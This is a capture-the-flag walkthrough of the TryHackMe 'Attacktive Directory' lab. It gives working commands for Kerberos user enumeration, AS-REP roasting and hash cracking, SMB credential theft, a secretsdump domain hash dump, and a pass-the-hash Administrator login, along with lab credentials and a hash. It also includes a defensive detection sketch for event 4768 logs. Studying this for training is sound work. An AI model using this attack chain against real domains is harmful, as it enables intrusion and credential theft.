# Attacktive Directory

**Room Link:** <https://tryhackme.com/room/attacktivedirectory>

## Walkthrough

### Setup

#### Installing Impacket

```
git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && python3 ./setup.py install
```

#### Installing Bloodhound and Neo4j

```
apt install bloodhound neo4j
```

#### Installing kerbrute

```
git clone https://github.com/ropnop/kerbrute.git
cd kerbrute/
make all
```

### Username and password custom lists for this machine

```
wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
```

### Welcome to Attacktive Directory

#### **Initial Scan**

```
nmap -A $VICTIM
```

#### Scan all ports

```
nmap -sV -sT -O -p 1-65535 $VICTIM
```

### netbios-ssn port 139 & microsoft-ds port 445

```
enum4linux $VICTIM
```

The output includes the NetBIOS domain name of the machine.

### Enumerating Users via Kerberos port 88

```
kerbrute/dist/kerbrute_linux_386 userenum --dc=$VICTIM -d=spookysec.local. userlist.txt
```

### Abusing Kerberos

**validusers.txt**

```
james
svc-admin
robin
darkstar
administrator
backup
paradox
```

The svc-admin account lets us request a ticket without a password, which means Kerberos pre-authentication is not required for it. The returned hash type is Kerberos 5 etype 23 AS-REP.

```
python3.9 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile validusers.txt -dc-ip $VICTIM spookysec.local/
```

Cracking the hash shows that the password is management2005.

```
hashcat -m18200 hash.txt passwordlist.txt
hashcat -m18200 hash.txt passwordlist.txt --show
```
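From the defender's side, the kerbrute user sweep and the no-pre-auth ticket request above both surface in the domain controller's event 4768 records. The following detection sketch is an added example, not part of the original walkthrough: the event records are constructed, the dictionary keys are simplified stand-ins for the event fields, and the threshold and window are assumed values.

```python
from collections import defaultdict

# Constructed sample of event 4768 (TGT request) records reduced to the fields
# used below; the probed names, addresses and times are invented for the example.
PROBED = ["alice", "bob", "carol", "dave", "erin", "frank"]
EVENTS = [{"time": t, "ip": "10.10.0.50", "user": u, "status": "0x6",
           "etype": "0xffffffff", "preauth": "-"} for t, u in enumerate(PROBED)]
EVENTS += [
    {"time": 5, "ip": "10.10.0.7", "user": "jmaes", "status": "0x6", "etype": "0xffffffff", "preauth": "-"},
    {"time": 90, "ip": "10.10.0.50", "user": "svc-admin", "status": "0x0", "etype": "0x17", "preauth": "0"},
    {"time": 95, "ip": "10.10.0.7", "user": "james", "status": "0x0", "etype": "0x12", "preauth": "2"},
]

UNKNOWN_PRINCIPAL = "0x6"  # KDC_ERR_C_PRINCIPAL_UNKNOWN: the name does not exist
RC4_HMAC = "0x17"          # etype 23, the type seen in the AS-REP above
NO_PREAUTH = "0"           # ticket issued without pre-authentication

def enumeration_sources(events, threshold=5, window=60):
    """Source IPs that asked for >= threshold distinct unknown names within window seconds."""
    by_ip = defaultdict(list)
    for e in events:
        if e["status"] == UNKNOWN_PRINCIPAL:
            by_ip[e["ip"]].append((e["time"], e["user"]))
    flagged = set()
    for ip, hits in by_ip.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1  # slide the window forward
            if len({u for _, u in hits[start:end + 1]}) >= threshold:
                flagged.add(ip)
                break
    return flagged

def asrep_without_preauth(events):
    """(user, source IP, is_rc4) for every TGT issued with no pre-authentication."""
    return [(e["user"], e["ip"], e["etype"] == RC4_HMAC)
            for e in events
            if e["status"] == "0x0" and e["preauth"] == NO_PREAUTH]

if __name__ == "__main__":
    print("enumeration sources:", enumeration_sources(EVENTS))
    print("no-pre-auth tickets:", asrep_without_preauth(EVENTS))
```

A single mistyped name from one workstation stays below the threshold, while the sweep source is flagged and the svc-admin request is reported with its RC4 marker.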

### Back to the Basics

### netbios-ssn port 139 & microsoft-ds port 445

```
smbclient -L $VICTIM -U "svc-admin"
Enter WORKGROUP\svc-admin's password: management2005
```

```
smbclient \\\\$VICTIM\\backup -U "svc-admin"
smb: \> dir
smb: \> get backup_credentials.txt 
```

It's a base64-encoded username and password: `backup@spookysec.local:backup2517860`

```
cat backup_credentials.txt
echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d
```

### Elevating Privileges within the Domain - **WinRM** port 5985

```
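# Dump the domain hashes with the backup account's credentials
python3 /usr/local/bin/secretsdump.py spookysec.local/backup:backup2517860@$VICTIM > allhashes.txt
# Hash lines are user:RID:LM hash:NT hash:::, so field 4 is the NT hash
cat allhashes.txt | awk -F : '{print $1 ":" $4}' | sort | uniq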
```

### Flag Submission Panel

Login as Administrator

```
evil-winrm -i $VICTIM -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
```

